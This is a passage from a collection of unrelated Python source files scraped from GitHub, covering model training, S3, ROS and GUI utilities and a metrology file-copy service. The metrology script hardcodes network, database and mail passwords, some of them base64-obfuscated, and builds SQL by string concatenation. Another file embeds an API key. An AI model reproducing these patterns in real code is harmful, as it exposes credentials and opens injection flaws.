[]\nbatch_size = 1\n\ndata_gen_args = dict(rotation_range=0.2,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range=0.05,\n zoom_range=0.05,\n horizontal_flip=True,\n fill_mode='nearest')\nmyGene = trainGenerator(batch_size,'data/train','image','label',data_gen_args,save_to_dir = 'data/train/aug')\n\nmodel_file = model_name + datetime.datetime.today().strftime(\"_%d_%m_%y_%H:%M:%S\") + \".h5\"\nmodel = build_res_unet(input_shape=input_shape)\nmodel.summary()#输出模型各层的参数状况\noptimizer = Adadelta()#梯度优化,自适应学习率调整\nmodel.compile(optimizer=optimizer, loss='mse', metrics=['accuracy'])\n\nmodel_checkpoint = ModelCheckpoint(os.path.join(\"models\", model_file), monitor='loss', save_best_only=True, verbose=True)\ntensorboard = TensorBoard()#计算图可视化\n#train_aug = ImageDataGenerator(vertical_flip=True, horizontal_flip=True)\n#train_gen = PASCALVOCIterator(directory=dataset_folder, target_file=\"train.txt\",\n #image_data_generator=train_aug, target_size=(input_shape[0], input_shape[1]),\n #batch_size=batch_size, classes=classes)\n\nmodel.fit_generator(myGene, steps_per_epoch=300,epochs=1,callbacks=[tensorboard, model_checkpoint])\ntestGene = testGenerator(\"data/test\")\nresults = model.predict_generator(testGene,6,verbose=1)\nsaveResult(\"data/test\",results)\n","repo_name":"Melissaliyuemei/resnet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16026404998","text":"import streamlit as st\r\nimport sqlite3\r\n\r\nst.title('Excluir cadastro')\r\n\r\n# Conectar ao banco de dados\r\nconn = sqlite3.connect('novo.db')\r\ncursor = conn.cursor()\r\n\r\n# Executar a consulta SQL para obter os dados da tabela 'entrada'\r\ncursor.execute(\"SELECT * FROM entrada\")\r\ndata = cursor.fetchall()\r\n\r\n# Obter os nomes das colunas\r\ncolumn_names = [description[0] for description in cursor.description]\r\n\r\n# Fechar a conexão com o banco de dados\r\nconn.close()\r\n\r\n# Criar uma tabela no Streamlit\r\ntable = \"\"\r\ntable += \"\"\r\nfor col_name in column_names:\r\n table += f\"\"\r\ntable += \"\"\r\n\r\n# Função para atualizar o status no banco de dados\r\ndef atualizar_status(id, novo_status):\r\n conn = sqlite3.connect('novo.db')\r\n cursor = conn.cursor()\r\n cursor.execute(\"UPDATE entrada SET Status=? WHERE ID=?\", (novo_status, id))\r\n conn.commit()\r\n conn.close()\r\n\r\n# Função para excluir uma linha do banco de dados\r\ndef excluir_cadastro(id):\r\n conn = sqlite3.connect('novo.db')\r\n cursor = conn.cursor()\r\n cursor.execute(\"DELETE FROM entrada WHERE ID=?\", (id,))\r\n conn.commit()\r\n conn.close()\r\n\r\n# Obter os valores únicos da coluna 'data' para o filtro\r\nunique_dates = list(set([row[column_names.index(\"data\")] for row in data]))\r\n\r\n# Criar um seletor de data para filtrar\r\nselected_date = st.date_input(\"Filtrar por data:\", value=None, min_value=None, max_value=None, key=None, help=None)\r\nif selected_date:\r\n filtered_data = [row for row in data if row[column_names.index(\"data\")] == selected_date.strftime(\"%Y-%m-%d\")]\r\nelse:\r\n filtered_data = data\r\n\r\n# Exibir os dados filtrados na tabela\r\nfor row in filtered_data:\r\n table += \"\"\r\n for value in row:\r\n table += f\"\"\r\n table += \"\"\r\ntable += \"
{col_name}
{value}
\"\r\n\r\n# Exibir a tabela no Streamlit\r\nst.write(table, unsafe_allow_html=True)\r\n\r\n# Excluir a linha selecionada\r\nselected_id = st.selectbox(\"Para excluir, selecione o ID:\", [str(row[0]) for row in filtered_data])\r\nif st.button('Excluir'):\r\n excluir_cadastro(selected_id)\r\n","repo_name":"lotenapedra/portaldeacesso","sub_path":"editar_excluir.py","file_name":"editar_excluir.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20951881082","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef main_detrend(detrend_degree: int, time: pd.Series, val: pd.DataFrame, label: list):\r\n \"\"\"\r\n This is the primary function for parsing the detrending of the data. The objective here is to\r\n take the inputs, and pass them to the appropriate type of detrending.\r\n :param detrend_degree: This is the degree of the polynomial that we want for detrending.\r\n :param time: The time series of the data we're looking at.\r\n :param val: The associated values for each time point of the data we're looking at.\r\n :param label: The name of all the signals in the data set.\r\n :return:\r\n detrend_data: pd.DataFrame containing the detrended data (values only!)\r\n trend: This is a Numpy Array containing the coefficients of the detrending, which we use for\r\n re-calculating approximations.\r\n std_list: Same as above, except as a pd.Series. Standard deviation is used as another part\r\n of the detrending, so we use it later for re-calculating the approximations.\r\n \"\"\"\r\n # We pass the function through our general polynomial fitting function. Technically, if the\r\n # detrend_degree is 0, there are faster ways of manipulating the data, but this is easier for\r\n # reference and formatting later.\r\n detrend_data, trend, std_list = poly_fit(time, val, label, detrend_degree)\r\n\r\n return detrend_data, trend, std_list\r\n\r\n\r\ndef constant_detrend(val: pd.DataFrame):\r\n \"\"\"\r\n Does a constant detrend of the data. This function is faster than a poly_fit with degree 0, but goes unused\r\n so that we can have a consistent output format. I'm keeping it here just in case.\r\n :param val: Input data from transient stability.\r\n :return:\r\n detrend_data: pd.DataFrame that contains the detrended data.\r\n mean_data: np.NdArray that contains the coefficients of the linear detrend function.\r\n std_list: dictionary that contains the standard deviation used for normalization.\r\n \"\"\"\r\n\r\n # Gets the means for all the signals.\r\n mean_data = val.mean()\r\n # Subtracts the mean from each of the corresponding signals.\r\n difference_data = val - mean_data\r\n # Gets the standard deviation for each signal.\r\n std_list = difference_data.std(ddof=0)\r\n # Gets the detrended data.\r\n detrend_data = difference_data / std_list\r\n\r\n return detrend_data, mean_data, std_list\r\n\r\n\r\ndef poly_fit(time_series: pd.Series, val: pd.DataFrame, labels: list, degree: int):\r\n \"\"\"\r\n This is a generic polynomial fitting function, along with detrending the data.\r\n :param time_series: The time series of the data we're looking at.\r\n :param val: The associated values for each time point of the data we're looking at.\r\n :param labels: The name of all the signals in the data set.\r\n :param degree: This is the degree of the polynomial that we want for detrending.\r\n :return:\r\n detrend_data: pd.DataFrame containing the detrended data (values only!)\r\n poly: This is a Numpy Array containing the coefficients of the detrending, which we use for\r\n re-calculating approximations.\r\n std_dict: Same as above, except as a pd.Series. Standard deviation is used as another part\r\n of the detrending, so we use it later for re-calculating the approximations.\r\n \"\"\"\r\n # Does a polynomial fit over the entire data set.\r\n poly = np.polynomial.polynomial.polyfit(time_series, val, degree)\r\n\r\n # Each column of poly_df refers to the coefficients of the equation c0 + c1*x + c2*x^2 + ... + cN * x^N\r\n poly_df = pd.DataFrame(poly, columns=labels)\r\n\r\n # To take advantage of itertuples and its speed, we transpose the DataFrame.\r\n poly_df = poly_df.T\r\n\r\n # This is where we'll store our standard deviations and detrended data.\r\n std_dict = {}\r\n detrend_dict = {}\r\n # Iterates through each row of the polynomial fit DataFrame.\r\n for row in poly_df.itertuples():\r\n # The index gets you the name of the signal.\r\n label = row.Index\r\n # The remaining information stored in the row are the coefficients of the polynomial fit.\r\n poly_func = np.array(list(row[1:]))\r\n poly_eval = np.polynomial.polynomial.polyval(time_series, poly_func)\r\n # Subtracts the linear fit from the original data, and renames the series for storage.\r\n difference = val[label].values - poly_eval\r\n difference = difference.rename(label)\r\n # Gets the standard deviation. We need this to rescale the data later.\r\n std_diff = difference.std(ddof=0)\r\n std_dict[label] = std_diff\r\n # Divides the data by the standard deviation for normalization.\r\n detrend = difference / std_diff\r\n # Stores the data in a new list.\r\n detrend_dict[label] = detrend\r\n\r\n # Converts the resulting dictionary into a new DataFrame.\r\n detrend_data = pd.DataFrame(detrend_dict)\r\n\r\n return detrend_data, poly_df, pd.Series(std_dict)\r\n","repo_name":"Weifarers/IMP","sub_path":"detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"18896919987","text":"import pytest\nfrom workos.events import Events\nfrom tests.utils.fixtures.mock_event import MockEvent\n\n\nclass TestEvents(object):\n @pytest.fixture(autouse=True)\n def setup(self, set_api_key, set_client_id):\n self.events = Events()\n\n @pytest.fixture\n def mock_events(self):\n events = [MockEvent(id=str(i)).to_dict() for i in range(100)]\n\n return {\n \"data\": events,\n \"list_metadata\": {\"after\": None},\n \"metadata\": {\n \"params\": {\n \"events\": None,\n \"limit\": None,\n \"after\": None,\n \"range_start\": None,\n \"range_end\": None,\n \"default_limit\": True,\n },\n \"method\": Events.list_events,\n },\n }\n\n def test_list_events(self, mock_events, mock_request_method):\n mock_request_method(\"get\", mock_events, 200)\n\n events = self.events.list_events()\n\n assert events == mock_events\n\n def test_list_events_returns_metadata(self, mock_events, mock_request_method):\n mock_request_method(\"get\", mock_events, 200)\n\n events = self.events.list_events(\n events=[\"dsync.user.created\"],\n )\n\n assert events[\"metadata\"][\"params\"][\"events\"] == [\"dsync.user.created\"]\n","repo_name":"workos/workos-python","sub_path":"tests/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"21055072087","text":"from tkinter import *\r\n\r\nroot=Tk()\r\n\r\nglobal time\r\ntime=60\r\n\r\ndef countdown():\r\n global time \r\n\r\n if time>0:\r\n time_label.config(text=\"Time Left: \"+str(time))\r\n time-=1\r\n time_label.after(1000, countdown)\r\n \r\n\r\ntime_label=Label(root, text=\"Time Left: \", font=('helectiva', 20, 'bold'))\r\ntime_label.pack()\r\n\r\nstart_button=Button(root, text=\"Start\", command=countdown)\r\nstart_button.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"GanneGowtham/Mini-Projects-using-Tkinter-module","sub_path":"Projects/60 seconds timer.py","file_name":"60 seconds timer.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32555075032","text":"import requests\n#this method gets the current location of the user\ndef get_current_location():\n payload = {'key': 'AC734C7771F717B36767BB165121F669', 'ip': requests.get('https://api.ipify.org').text, 'format': 'json'}\n api_result = requests.get('https://api.ip2location.io/', params=payload)\n json_result = api_result.json()\n city = json_result['city_name']\n latitude = json_result['latitude']\n longitude = json_result['longitude']\n return latitude, longitude, city\n\nprint(get_current_location())","repo_name":"mysticfiretail/CS411","sub_path":"get_current_loc.py","file_name":"get_current_loc.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17457944992","text":"import pandas as pd\nimport pypyodbc as pyodbc\nimport shutil\nimport os\nimport subprocess\nimport datetime\nimport sys, traceback\nimport base64\n################################################################################\npython_file_path = os.path.dirname(os.path.realpath(__file__))\n################################################################################\n\ndef lambda_(ctx):\n global logger\n global date_now\n global date_string\n global informatics_db_server\n global metrology_root_dir\n result = {'isok':-1, 'error_message':'', 'uuid':0}\n date_now = datetime.datetime.now()\n date_string = date_now.strftime(\"%Y-%m-%d %H:%M:%S\")\n df_config = pd.read_excel(python_file_path+r'\\metrology_config.xlsx', sheet_name='config')\n informatics_db_server = df_config['informatics_db_server'].iloc[0]\n metrology_root_dir = df_config['metrology_root_dir'].iloc[0]\n #\n try:\n #if True:\n ### Get data for Metrology tools; read from Excel file ###\n #df_equip = pd.read_sql_query(sql_get_equip(),db_imdb)\n df_equip = pd.read_excel(python_file_path+r'\\metrology_config.xlsx', sheet_name='push')\n df_equip.columns = [x.lower() for x in df_equip.columns]\n df_equip = df_equip[df_equip['active'] == 1]\n df_equip['equipmentid'] = df_equip['equipmentid'].astype(int, errors='ignore')\n df_equip.set_index('equipmentid',drop=False,inplace=True)\n equip_id_list = df_equip['equipmentid'].tolist()\n equip_id_string = ','.join(str(e) for e in equip_id_list)\n #\n df_email = pd.DataFrame(columns=('fileid','source','destination', \\\n 'created','lastmodified','copy_result','comment'))\n #print(equip_id_list)\n #print(equip_id_string)\n #print(df_equip)\n #return result\n ### Database connection ###\n db_config = DBConfig()\n db_imdb = pyodbc.connect(db_config['IMDB_CONN_STRING'])\n cur_imdb = db_imdb.cursor()\n # get set of files to be copied\n #### Set start date ###\n #start_date = '2018-05-28'\n window = 7 # days\n start_date = (date_now - datetime.timedelta(days=window)).strftime(\"%Y-%m-%d\")\n df_files = pd.read_sql_query(sql_get_files(start_date,equip_id_string),db_imdb)\n #print(df_files)\n #return result\n # loop through file list\n ### set up network connection ###\n if os.popen('net use').read().find(metrology_root_dir) < 0:\n net_use = 'NET USE \"' + metrology_root_dir + r'\" $3rv1c3 /user:intermolecular\\s_cf'\n subprocess.call(net_use, shell=True)\n ### Loop through file list ###\n for index, row in df_files.iterrows():\n # DataFileLog row data\n fileid = row['fileid']\n equipmentid = row['equipmentid']\n filename = row['filename']\n datadir = row['datadir']\n filefullpath = row['filefullpath']\n created = row['created']\n lastmodified = row['lastmodified']\n lastlogged = row['lastlogged']\n previous_copy_result = row['result']\n equipmentname = df_equip.at[equipmentid, 'equipmentname']\n metrology_data_dir = df_equip.at[equipmentid, 'metrology_data_dir']\n suffix = df_equip.at[equipmentid, 'suffix']\n ### Check that source file exists ###\n ### If not, make an entry in the db and skip to the next record ###\n #print(filefullpath)\n if not os.path.exists(filefullpath):\n if previous_copy_result == None:\n copy_result = -1\n # Don't try to copy again\n comment = 'Source file not found'\n destination = ''\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n continue\n ### metrology CDP directory\n try:\n cdp_number = int(filename[0:3])\n except:\n cdp_number = 0\n if cdp_number <= 0:\n '''\n ### Can't determine CDP\n ### Don't copy but make an entry in db and skip to next record\n if previous_copy_result == None:\n copy_result = -1\n ### Don't try to copy again\n comment = 'Bad file name format'\n destination = ''\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n continue\n '''\n metrology_cdp_dir = 'NoCDP'\n elif cdp_number == 1:\n metrology_cdp_dir = 'Intermolecular'\n elif cdp_number <= 9:\n metrology_cdp_dir = 'CDP00' + str(cdp_number)\n elif cdp_number <= 99:\n metrology_cdp_dir = 'CDP0' + str(cdp_number)\n else:\n metrology_cdp_dir = 'CDP' + str(cdp_number)\n met_dir = metrology_root_dir + '\\\\' + metrology_cdp_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # metrology data directory\n # Special case for XRD/XRR\n if metrology_data_dir == 'XRD,XRR':\n if filename.find('XRR') >= 0 or datadir.find('XRR') >= 0:\n metrology_data_dir = 'XRR'\n else:\n metrology_data_dir = 'XRD'\n # Special case for SEM/EDS\n if metrology_data_dir == 'SEM,EDS':\n if datadir.find('EDS_Data') >= 0:\n metrology_data_dir = 'EDS'\n else:\n metrology_data_dir = 'SEM'\n met_dir = met_dir + '\\\\' + metrology_data_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # sub directory with year-month\n met_month_dir = str(created)[0:7]\n met_dir = met_dir + '\\\\' + met_month_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # metrology file name\n n = filename.rindex('.'); s1 = filename[:n]; s2 = filename[n:]\n met_filename = s1 + '_' + suffix + s2\n # destination full path and file name\n destination = met_dir + '\\\\' + met_filename\n ### copy file ###\n copy_return = shutil.copy2(filefullpath, destination)\n # For Ellipsometer, every .txt file is associated with a .SE file\n # which is not in the DataFileLog table; copy this as well\n if metrology_data_dir == 'ELLIPSOMETRY' and filefullpath.endswith('.txt'):\n filefullpath2 = filefullpath.replace('.txt','.SE')\n destination2 = destination.replace('.txt','.SE')\n if os.path.exists(filefullpath2):\n copy_return2 = shutil.copy2(filefullpath2, destination2)\n #################\n # check if copy succeeded\n if os.path.exists(destination):\n copy_result = 1\n # copy successful\n comment = ''\n else:\n copy_result = 0\n # Attempted to copy but failed\n # Will attempt to copy again next time\n comment = 'ERROR: File not detected at destination'\n # Make an entry that will be sent in email at the end\n df_email = df_email.append( { 'fileid':fileid,\n 'source':filefullpath, 'destination':destination,\n 'created':created, 'lastmodified':lastmodified,\n 'copy_result':copy_result, 'comment':comment }, ignore_index=True)\n # write to DataFileMetrology table\n if previous_copy_result == None:\n # New file, not previously copied\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n else:\n if copy_result == 1 and previous_copy_result == 1:\n comment = 'New version of previously copied file'\n sql = sql_metrology_update(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n # close database connection\n db_imdb.close()\n # send email if errors have been generated\n if df_email.shape[0] > 0:\n with pd.option_context('display.max_colwidth', -1):\n output_html = df_email.to_html()\n send_metrology_email(output_html)\n # close network connection\n # on second thoughts, let's just leave it open as we're running so frequently\n #if prev_met_root_dir != None:\n # net_use = 'NET USE \"' + prev_met_root_dir + r'\" /DELETE'\n # subprocess.call(net_use, shell=True)\n # finished\n result['isok'] = 1\n return result\n except Exception as ex:\n logger.error('****** Exception in metrology_push.py ******')\n logger.error(date_string)\n logger.error(\"[\" + __name__ + \"]:\" + str(ex), exc_info=True)\n logger.error('************************************')\n result['error_message'] = 'Exception occurred in metrology_push.py'\n result['Exception'] = str(ex)\n # https://docs.python.org/3/library/traceback.html\n exc_type, exc_value, exc_traceback = sys.exc_info()\n result['exc_type'] = repr(exc_type)\n result['exc_value'] = repr(exc_value)\n tb = traceback.format_tb(exc_traceback, limit=None)\n n = len(tb); s1 = tb[n-1]; s2 = s1.strip().split('\\n'); i = 0\n for s in s2:\n i += 1; result['exc_traceback'+str(i)] = s.strip()\n return result\n\n\n\ndef DBConfig():\n IMDB_SERVER = informatics_db_server\n IMDB_DB = 'IMDB'\n IMDB_USER = 'sa'\n if informatics_db_server == 'dev-db-01':\n IMDB_PWD = base64.b64decode(b'aW50ZXJtb2xlY3VsYXIx').decode('utf-8')\n else:\n IMDB_PWD = base64.b64decode(b'U3Rhclcwcno=').decode('utf-8')\n IMDB_CONN_STRING = 'Driver={SQL Server};Server=%s;Database=%s;UID=%s;PWD=%s;' %(IMDB_SERVER, IMDB_DB, IMDB_USER, IMDB_PWD)\n return { 'IMDB_CONN_STRING' : IMDB_CONN_STRING }\n'''\ndef sql_get_equip():\n return (\"SELECT e.EquipmentID, e.EquipmentName, et.EquipmentType \"\n \"FROM Equipment e \"\n \"JOIN EquipmentType et on e.EquipmentTypeID = et.EquipmentTypeID \"\n \"WHERE e.EquipmentID in (\" + equip_id_string + \") \"\n \"ORDER BY e.EquipmentName\" )\n'''\ndef sql_get_files(date_string, equip_id_string):\n return (\"SELECT dfl.FileID,dfl.Created,dfl.LastModified,dfl.LastLogged,\"\n \"dfl.EquipmentID,dfl.DataDir,dfl.FileName,dfl.FileFullPath,dfm.Result \"\n \"FROM DataFileLog dfl \"\n \"LEFT JOIN DataFileMetrology dfm ON dfl.FileID = dfm.FileID \"\n \"WHERE dfl.EquipmentID in (\" + equip_id_string + \") \"\n \"AND dfl.LastModified >= '\" + date_string + \"' \"\n \"AND ( dfm.FileID IS NULL \" # new file not copied\n \"OR dfm.Result = 0 \" # previous copy attempt failed\n \"OR DATEDIFF(second, dfm.LastModified, dfl.LastModified) > 1.0 )\" ) \n # newer version of previously copied file\n\n# As usual, dates are problematic. For a good overview of dates in Python see:\n# https://stackoverflow.com/questions/13703720/converting-between-datetime-timestamp-and-datetime64/13753918#13753918\n\ndef sql_metrology_insert(fileid, destination, created, lastmodified, result, comment):\n return (\"INSERT INTO DataFileMetrology \"\n \"(FileID,Destination,Created,LastModified,DateCopied,Result,Comment) \"\n \"VALUES (\" + str(fileid) + \",'\"\n + destination + \"','\"\n + str(created)[0:23] + \"','\"\n + str(lastmodified)[0:23] + \"',\"\n + \"SYSDATETIME(),\"\n + str(result) + \",'\"\n + comment + \"')\" )\n\ndef sql_metrology_update(fileid, destination, created, lastmodified, result, comment):\n return (\"UPDATE DataFileMetrology \"\n \"SET Destination = '\" + destination + \"', \"\n \"Created = '\" + str(created)[0:23] + \"', \"\n \"LastModified = '\" + str(lastmodified)[0:23] + \"', \"\n \"DateCopied = SYSDATETIME(), \"\n \"Result = \" + str(result) + \", \"\n \"Comment = '\" + comment + \"' \"\n \"WHERE FileID = \" + str(fileid) )\n\n\ndef send_metrology_email(message):\n import smtplib\n from email.mime.text import MIMEText\n from email.mime.multipart import MIMEMultipart\n # https://en.wikibooks.org/wiki/Python_Programming/Email\n server = smtplib.SMTP('mail.intermolecular.com', 25)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(\"intermolecular\\s_cf\", \"$3rv1c3\")\n #\n from_addr = 'Python Metrology '\n to_addrs = 'George.Li@intermolecular.com,malcolm.mcgregor@intermolecular.com'\n #to_addrs = 'malcolm.mcgregor@intermolecular.com,George.Li@intermolecular.com'\n #to_addrs = 'pipeline.pilot@intermolecular.com, malcolm.mcgregor@intermolecular.com'\n #cc_addrs = 'malcolm.mcgregor@intermolecular.com'\n #\n msg = MIMEMultipart()\n msg['From'] = from_addr\n msg['To'] = to_addrs\n #msg['Cc'] = cc_addrs\n msg['Subject'] = 'Message from Python Metrology Service'\n #\n body = 'This is an automated message from Informatics; '\n body = body + 'please do not repond to this message; '\n body = body + 'instead contact a member of the informatics team in the '\n body = body + 'recipents above with any question or issues.

'\n body = body + 'There were some error messages generated when attempting '\n body = body + 'to copy from the Informatics server to the Metrology server; '\n body = body + 'see below.

'\n body = body + message\n #\n msg.attach(MIMEText(body, 'html'))\n text = msg.as_string()\n #s = server.sendmail(from_addr, to_addrs, text)\n server.send_message(msg)\n\n\n\n'''\nNotes:\nThe code only reads from 1 database table in IMDB:\n- the existing DataFileLog table.\nIt writes to only 1 table:\n- the newly created DataFileMetrology table, that only this app uses.\n\nScript for creating DataFileMetrology table:\n\nCREATE TABLE DataFileMetrology (\nFileID int NOT NULL PRIMARY KEY,\nDestination varchar(500),\nCreated datetime,\nLastModified datetime,\nDateCopied datetime,\nResult int,\nComment varchar (255)\n);\n\nDescription of database table fields:\nEach row is a file that corresponds to the DataFileLog table.\n FileID : from DataFileLog table\n Destination : full file name and path to metrology folder\n Created : from DataFileLog table\n LastModified : from DataFileLog table\n - used to determine if a new file version is available\n DateCopied : timestamp of entry\n Result : \n 1 = File successfully copied and detected at destination\n 0 = Copy attempt failed; file not detected at destination; \n will attempt to copy again next time\n -1 = Copy not attempted for known reason, eg. wrong file name format; \n will NOT attempt to copy again\n Comment : additional information such as error messages\n\n'''\n\n\n\nif __name__ == '__main__':\n import sys, re\n import logging\n logger = logging.getLogger(__name__)\n logging.basicConfig(filename=python_file_path+r'\\log\\metrology_push.log',level=logging.DEBUG)\n\n ctx= {}\n ctx['logger'] = logger\n ctx['uuid'] = 0\n ctx['args'] = {}\n \n result = lambda_(ctx)\n #print(result)\n","repo_name":"Claire56/metrology-IMI","sub_path":"metrology_push.py","file_name":"metrology_push.py","file_ext":"py","file_size_in_byte":15756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34764242821","text":"from controller_manager import switch_controllers\n\nfrom ros2cli.node.direct import add_arguments\nfrom ros2cli.node.strategy import NodeStrategy\nfrom ros2cli.verb import VerbExtension\n\nfrom ros2controlcli.api import add_controller_mgr_parsers, LoadedControllerNameCompleter\n\n\nclass SwitchControllersVerb(VerbExtension):\n \"\"\"Switch controllers in a controller manager.\"\"\"\n\n def add_arguments(self, parser, cli_name):\n add_arguments(parser)\n arg = parser.add_argument(\n \"--deactivate\",\n nargs=\"*\",\n default=[],\n help=\"Name of the controllers to be deactivated\",\n )\n arg.completer = LoadedControllerNameCompleter([\"active\"])\n arg = parser.add_argument(\n \"--activate\",\n nargs=\"*\",\n default=[],\n help=\"Name of the controllers to be activated\",\n )\n arg.completer = LoadedControllerNameCompleter([\"inactive\"])\n parser.add_argument(\"--strict\", action=\"store_true\", help=\"Strict switch\")\n parser.add_argument(\"--activate-asap\", action=\"store_true\", help=\"Start asap controllers\")\n parser.add_argument(\n \"--switch-timeout\",\n default=5.0,\n required=False,\n help=\"Timeout for switching controllers\",\n )\n arg.completer = LoadedControllerNameCompleter([\"inactive\"])\n add_controller_mgr_parsers(parser)\n\n def main(self, *, args):\n with NodeStrategy(args) as node:\n response = switch_controllers(\n node,\n args.controller_manager,\n args.deactivate,\n args.activate,\n args.strict,\n args.activate_asap,\n args.switch_timeout,\n )\n if not response.ok:\n return \"Error switching controllers, check controller_manager logs\"\n\n print(\"Successfully switched controllers\")\n return 0\n","repo_name":"ros-controls/ros2_control","sub_path":"ros2controlcli/ros2controlcli/verb/switch_controllers.py","file_name":"switch_controllers.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"40"} +{"seq_id":"7678382583","text":"import datetime, boto3, os, logging\nfrom utils.env import Env\nfrom botocore.exceptions import ClientError\n\n\nenv = Env()\n\n\nclass S3Client:\n def __init__(self) -> None:\n self.client = boto3.client(\n \"s3\",\n endpoint_url=env.get_value(\"S3_URL\"),\n aws_access_key_id=env.get_value(\"S3_ACCESS_KEY\"),\n aws_secret_access_key=env.get_value(\"S3_SECRET_KEY\"),\n config=boto3.session.Config(signature_version=\"s3v4\"),\n region_name=\"us-east-1\",\n )\n self.bucket_name = env.get_value(\"S3_BUCKET_NAME\")\n self.enable_versioning()\n\n def enable_versioning(self):\n self.client.put_bucket_versioning(\n Bucket=self.bucket_name, VersioningConfiguration={\"Status\": \"Enabled\"}\n )\n\n\nclass S3Utils(S3Client):\n def __init__(self) -> None:\n super().__init__()\n\n def get_object_version_and_last_modified(self, object_name: str) -> tuple[str, str]:\n try:\n response = self.client.list_object_versions(\n Bucket=self.bucket_name, Prefix=object_name\n )\n version_id = response[\"Versions\"][0][\"VersionId\"]\n last_modified = response[\"Versions\"][0][\"LastModified\"]\n return version_id, last_modified.replace(microsecond=0)\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def get_object_all_version_and_last_modified(self, prefix: str) -> dict[str:str]:\n mapping = {}\n response = self.client.list_object_versions(\n Bucket=self.bucket_name, Prefix=prefix\n )\n for obj_version in response.get(\"Versions\", []):\n mapping[\n obj_version[\"LastModified\"].replace(microsecond=0).isoformat()\n ] = obj_version[\"VersionId\"]\n return mapping\n\n def upload_file(\n self, file_name: str, object_name: str = None, path_name: str = None\n ) -> tuple[str, datetime.datetime]:\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n if path_name is not None:\n if path_name.endswith(\"/\") is False:\n path_name = path_name + \"/\"\n object_name = path_name + object_name\n\n try:\n with open(file_name, \"rb\") as data:\n response = self.client.put_object(\n Bucket=self.bucket_name, Key=object_name, Body=data\n )\n version_id = response.get(\"VersionId\", None)\n\n object_head = self.client.head_object(\n Bucket=self.bucket_name, Key=object_name, VersionId=version_id\n )\n last_modified = object_head[\"LastModified\"].replace(microsecond=0)\n\n return version_id, last_modified\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def upload_files_and_remove(\n self, file_name: str, object_name: str = None, path_name: str = None\n ):\n file_name_and_version_id = {}\n file_name_and_last_modified = {}\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n if path_name is not None:\n if path_name.endswith(\"/\") is False:\n path_name = path_name + \"/\"\n object_name = path_name + object_name\n\n try:\n with open(file_name, \"rb\") as data:\n response = self.client.put_object(\n Bucket=self.bucket_name, Key=object_name, Body=data\n )\n version_id = response.get(\"VersionId\", None)\n\n object_head = self.client.head_object(\n Bucket=self.bucket_name, Key=object_name, VersionId=version_id\n )\n last_modified = object_head[\"LastModified\"].replace(microsecond=0)\n\n file_name_and_version_id[os.path.basename(file_name)] = version_id\n file_name_and_last_modified[file_name] = last_modified\n\n return file_name_and_version_id, file_name_and_last_modified\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def delete_file(self, object_name: str) -> None:\n try:\n self.client.delete_object(\n Bucket=self.bucket_name,\n Key=object_name,\n )\n except ClientError as e:\n logging.error(e)\n\n\nif __name__ == \"__main__\":\n s3_utils = S3Utils()\n\n # file_path = r\"D:\\Downloads\\Twitter.mp4\"\n # version_id, last_modified = s3_utils.upload_file(file_path, path_name=\"videos\")\n # print(version_id, last_modified)\n # s3_utils.client.delete_object(\n # Bucket=s3_utils.bucket_name,\n # Key=\"videos/Twitter.mp4\",\n # )\n dict_last_ver = s3_utils.get_object_all_version_and_last_modified(\"videos/\")\n print(dict_last_ver)\n key_list = list(dict_last_ver.keys())\n print(key_list[0])\n print(type(key_list[0]))\n print(\"*\" * 50)\n (\n version_id,\n last_modified,\n ) = s3_utils.get_object_version_and_last_modified(\"videos\")\n print(version_id, last_modified)\n print(type(version_id))\n print(type(last_modified))\n","repo_name":"Tondejphajin/file-service-download","sub_path":"utils/s3_utils.py","file_name":"s3_utils.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5565304348","text":"import os\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QDialog, QVBoxLayout, QHBoxLayout, QPushButton, QLabel, QFileDialog, QListWidget, QListWidgetItem, QWidget\nfrom PyQt5.QtGui import QPixmap, QCursor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore\n\n\nclass ImageViewer(QDialog):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setStyleSheet(\"background-color:#161219;\")\n self.setWindowTitle('Image Viewer')\n self.setGeometry(100, 100, 800, 600)\n\n main_layout = 